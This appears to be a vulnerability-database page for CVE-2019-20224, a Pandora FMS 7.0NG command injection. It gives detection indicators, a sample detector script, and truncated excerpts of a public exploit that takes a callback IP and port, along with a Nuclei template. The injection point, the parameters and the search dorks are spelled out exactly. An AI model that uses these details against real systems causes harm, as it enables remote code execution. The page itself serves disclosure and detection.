CVE-2019-20224
Published 2020-01-09
Priority: P273 · Severity: high · CVSS 3.1 score: 8.8
Exploit available · EPSS: 50.62% (98.8th percentile)
netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. This issue has been fixed in Pandora FMS 7.0 NG 742.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica | pandora_fms | — | — |
| artica | pandora_fms | — | — |
Detection & IOCs (extracted from sources)
- Monitor POST requests to /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view containing shell metacharacters (e.g., ";", "#") in the ip_src parameter, which is the injection point for OS command execution.
- Shodan/FOFA/Google dork can be used to identify exposed Pandora FMS instances: search for HTTP title 'pandora fms'.
- The exploit uses a two-step HTTP flow: first a POST login to /pandora_console/index.php?login=1, then a POST to the netflow live view endpoint with the malicious ip_src payload. Correlate these two sequential requests from the same source IP.
- The draw_button=Draw POST parameter must be present alongside the malicious ip_src value; filter for POST bodies containing both 'draw_button=Draw' and shell metacharacters in 'ip_src'.
- Outbound ncat/curl connections spawned from the Pandora FMS process (e.g., PHP) may indicate successful exploitation; monitor for child processes of the web server executing network tools like ncat or curl.
- Exploitation requires valid authenticated credentials; unauthenticated exploitation is not possible. The vulnerability is in the netflow_get_stats function within functions_netflow.php.
- The vulnerability is fixed in Pandora FMS 7.0 NG 742; instances running versions prior to 742 are affected.
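A defender-side check for the indicators listed above (a POST to the nf_live_view endpoint carrying draw_button=Draw and shell metacharacters in ip_src, correlated with a preceding login from the same source IP), written as an added example that is not taken from any of the page's sources. The request records are constructed sample data, and the metacharacter set beyond ";" and "#" is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request records (not real traffic): (src_ip, method, url, body).
# The third record is the only one that should fire: ip_src carries ";" and "#".
SAMPLE_REQUESTS = [
    ("10.0.0.5", "POST", "/pandora_console/index.php?login=1",
     "nick=operator&pass=REDACTED&login_button=Login"),
    ("10.0.0.5", "POST", "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view",
     "ip_src=10.1.1.1&draw_button=Draw"),
    ("10.0.0.5", "POST", "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view",
     "ip_src=10.1.1.1%3B%23&draw_button=Draw"),
    ("10.0.0.9", "GET", "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view", ""),
]

# ";" and "#" are the metacharacters named in the IOC; | & ` $ are added as an assumption.
SHELL_META = re.compile(r"[;#|&`$]")
NF_LIVE_VIEW = "operation/netflow/nf_live_view"


def is_suspicious(method, url, body):
    """True for a POST to nf_live_view whose body has draw_button=Draw and a metacharacter in ip_src."""
    if method != "POST" or NF_LIVE_VIEW not in url:
        return False
    params = parse_qs(body)  # percent-decodes values, so %3B becomes ";"
    if "Draw" not in params.get("draw_button", []):
        return False
    return any(SHELL_META.search(value) for value in params.get("ip_src", []))


def find_alerts(requests):
    """Return (src_ip, decoded ip_src, seen_login_first) for each suspicious request."""
    logged_in = set()  # source IPs that posted to the login endpoint earlier in the stream
    alerts = []
    for src_ip, method, url, body in requests:
        if method == "POST" and "login=1" in urlsplit(url).query:
            logged_in.add(src_ip)
            continue
        if is_suspicious(method, url, body):
            ip_src = parse_qs(body)["ip_src"][0]
            alerts.append((src_ip, ip_src, src_ip in logged_in))
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_REQUESTS):
        print("ALERT src=%s ip_src=%r login_seen_first=%s" % alert)
```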
CVSS provenance
- NVD v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 9.0 CRITICAL, AV:N/AC:L/Au:S/C:C/I:C/A:C
GHSA
GHSA-8x4w-7qgf-ghm2: functions_netflow (ghsa_unreviewed · 2022-05-24 · CVSS 8.8)
CVE-2020-8947 [HIGH]
functions_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf_live_view ip_dst, dst_port, or src_port parameter, a different vulnerability than CVE-2019-20224.
GHSA
GHSA-gv9r-c8f3-vqh2: netflow_get_stats in functions_netflow (ghsa_unreviewed · 2022-05-24)
CVE-2019-20224 [HIGH]
netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
No detection rules found.
Exploit-DB
Pandora 7.0NG - Remote Code Execution (exploitdb · 2020-01-10 · CVSS 8.8)
CVE-2019-20224 [HIGH]
---
```python
# Exploit Title: Pandora 7.0NG - Remote Code Execution
# Date: 2019-11-14
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2019-20224
# Vendor Homepage: https://pandorafms.org/
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Version: v7.0NG
# Tested on: CentOS 7.3 / PHP 5.4.16
#!/usr/bin/python3
import requests
import sys

if len(sys.argv) != 6:
    print("[+] Usage : ./exploit.py target username password ip port")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = int(sys.argv[5])

request = requests.session()

login_info = {
    "nick": username,
    "pass": password,
    "login_button": "Login"
}

login_request = request.post(
    target+"/pandora_console/index.php?login=1
```
Nuclei
Pandora FMS 7.0NG - Remote Command Injection (nuclei · CVSS 8.8)
CVE-2019-20224 [HIGH]
Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
Template:
```yaml
id: CVE-2019-20224

info:
  name: Pandora FMS 7.0NG - Remote Command Injection
  author: ritikchaddha
  severity: high
  description: |
    Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
  remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
  reference:
    - https:/
```
Fortinet
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability (blogs_fortinet · 2022-10-21 · CVSS 9.8)
CVE-2022-22954 [CRITICAL]
FortiGuard Labs Threat Research
By Cara Lin | October 21, 2022
In April, VMware patched a vulnerability, CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on the parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published a Threat Signal Report about it and also developed an IPS signature in April.
We have observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc. But in August, there were a few particular payloads that got our interest. They had th
Greynoiseio
NoiseLetter February 2026 (blogs_greynoiseio)
References
- http://packetstormsecurity.com/files/155897/Pandora-7.0NG-Remote-Code-Execution.html
- https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view?usp=sharing
- https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9
- https://pandorafms.com/downloads/solved-pandorafms-742.mp4
- https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/